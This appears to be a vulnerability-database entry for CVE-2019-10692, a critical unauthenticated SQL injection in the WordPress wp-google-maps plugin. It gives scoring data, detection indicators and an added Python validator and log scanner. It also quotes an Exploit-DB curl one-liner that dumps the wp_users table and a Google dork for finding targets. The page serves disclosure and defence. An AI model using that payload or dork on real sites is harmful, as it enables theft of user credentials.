CVE-2019-10692
Published 2019-04-02
Priority: P2 78 · Severity: critical · CVSS 3.1 base score: 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Public exploit: available
EPSS: 78.70% (99.5th percentile)
In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codecabin | wp_go_maps | < 7.11.18 | 7.11.18 |
Detection & IOCs (extracted from sources)
- Look for GET requests to the WordPress REST API endpoint /wpgmza/v1/markers with a 'fields' parameter containing SQL injection payloads such as '* from wp_users -- -'.
- A successful exploitation response will contain the JSON fields 'user_login', 'user_pass', and 'user_nicename' in the response body, with Content-Type application/json and HTTP 200.
- Use the Google Dork 'inurl:index.php?rest_route=/wpgmza/' to identify potentially vulnerable WordPress instances exposed on the internet.
- The vulnerability exists in wp-google-maps plugin versions between 7.11.00 and 7.11.17 inclusive; the REST endpoint is unauthenticated and requires no privileges to exploit.
- The WordPress database table prefix is configurable by administrators and may not be 'wp_'; the SQL injection payload must be adjusted accordingly (e.g., 'wp_users' may differ).
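The indicators above describe what exploitation looks like on the wire: a request to the markers REST route whose 'fields' parameter is not a plain column list, answered with HTTP 200 JSON. The following is an added example (not code from this record or from any of the indexed sources) that turns that into two defender-side checks: an allowlist validator for the 'fields' parameter, which is the fix pattern for identifier injection because column names cannot be bound as prepared-statement parameters, and a scanner that applies the same validator to web-server access-log lines. The column names in ALLOWED_FIELDS and the sample log lines are constructed for the example; the plugin's real column set is not on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical allowlist of marker columns. The real plugin's column set is
# not part of this record, so these names are assumptions for the example.
ALLOWED_FIELDS = {"id", "map_id", "address", "lat", "lng", "title", "description"}

# A single plain SQL identifier: letters, digits and underscore only.
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

# The REST route named in the indicators, reachable either via
# ?rest_route=/wpgmza/v1/markers or via the /wp-json/ permalink form.
WPGMZA_MARKERS = "/wpgmza/v1/markers"

# Combined-log-format request line; only method, target and status are needed.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def validate_fields(raw, allowed=ALLOWED_FIELDS):
    """Allowlist validation of a comma-separated 'fields' parameter.

    Returns the accepted column names, or None if any requested field is not
    a plain identifier from the allowlist. Rejecting the whole request is the
    right response: identifiers cannot be escaped the way string values can,
    so the only safe SELECT column list is one built from known names.
    """
    fields = [f.strip() for f in raw.split(",") if f.strip()]
    if not fields:
        return None
    for f in fields:
        if not IDENTIFIER.match(f) or f.lower() not in allowed:
            return None
    return fields


def wpgmza_fields_param(target):
    """Return the decoded 'fields' value if the request targets the markers
    REST route (either URL form), otherwise None."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    route = qs["rest_route"][0] if "rest_route" in qs else parts.path
    if WPGMZA_MARKERS not in route or "fields" not in qs:
        return None
    # parse_qs already percent-decodes and turns '+' into spaces.
    return qs["fields"][0]


def scan_access_log(lines):
    """Flag requests whose 'fields' parameter fails allowlist validation.

    Returns a list of (line_number, http_status, decoded_fields). The status
    is kept because the indicators tie a successful exploit to HTTP 200.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        fields = wpgmza_fields_param(m.group("target"))
        if fields is None:
            continue
        if validate_fields(fields) is None:
            hits.append((n, int(m.group("status")), fields))
    return hits


# Constructed access-log lines for the example: one benign markers request,
# one carrying the payload shape from the indicators, one benign request in
# the /wp-json/ form, and one unrelated route that also has a 'fields' param.
SAMPLE_LOG = [
    '203.0.113.9 - - [09/Sep/2020:10:00:01 +0000] "GET /index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%7D&fields=id,lat,lng HTTP/1.1" 200 512',
    '203.0.113.9 - - [09/Sep/2020:10:00:02 +0000] "GET /index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%7D&fields=*+from+wp_users+--+- HTTP/1.1" 200 2048',
    '198.51.100.4 - - [09/Sep/2020:10:00:03 +0000] "GET /wp-json/wpgmza/v1/markers?fields=title%2Caddress HTTP/1.1" 200 300',
    '198.51.100.4 - - [09/Sep/2020:10:00:04 +0000] "GET /wp-json/wp/v2/posts?fields=id HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, status, fields in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: status {status}, rejected fields={fields!r}")
```

Only the second sample line is flagged: its decoded 'fields' value is not a list of allowlisted identifiers, and it was answered with 200, which is the combination the indicators describe. Requests to other REST routes are ignored even when they carry a 'fields' parameter, so the scanner stays specific to this endpoint.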
CVSS provenance
- NVD (CVSS v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD (CVSS v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
No detection rules found.
Exploit-DB
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection (exploitdb · 2020-10-20 · CVSS 9.8)
---
# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection
# Google Dork: inurl:index.php?rest_route=/wpgmza/
# Date: 2020-09-09
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers
# Software Link: https://wordpress.org/plugins/wp-google-maps/
# Version: < 7.11.18
# Tested on: Linux
# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10692)
#!/bin/bash
TARGET="192.168.1.77"
curl -k --silent \
  "http://$TARGET/index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%7D&fields=*+from+wp_users+--+-" \
  | jq
Nuclei
WordPress Google Maps <7.11.18 - SQL Injection (nuclei · CVSS 9.8)
WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
Template:
id: CVE-2019-10692
info:
  name: WordPress Google Maps <7.11.18 - SQL Injection
  author: pussycat0x
  severity: critical
  description: |
    WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
Metasploit
WordPress Google Maps Plugin SQL Injection (auxiliary/admin/http/wp_google_maps_sqli)
This module exploits a SQL injection vulnerability in a REST endpoint registered by the WordPress plugin wp-google-maps between 7.11.00 and 7.11.17 (included). As the table prefix can be changed by administrators, set DB_PREFIX accordingly.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/159640/WordPress-Rest-Google-Maps-SQL-Injection.html
- http://www.rapid7.com/db/modules/auxiliary/admin/http/wp_google_maps_sqli
- https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755
- https://wordpress.org/plugins/wp-google-maps/#developers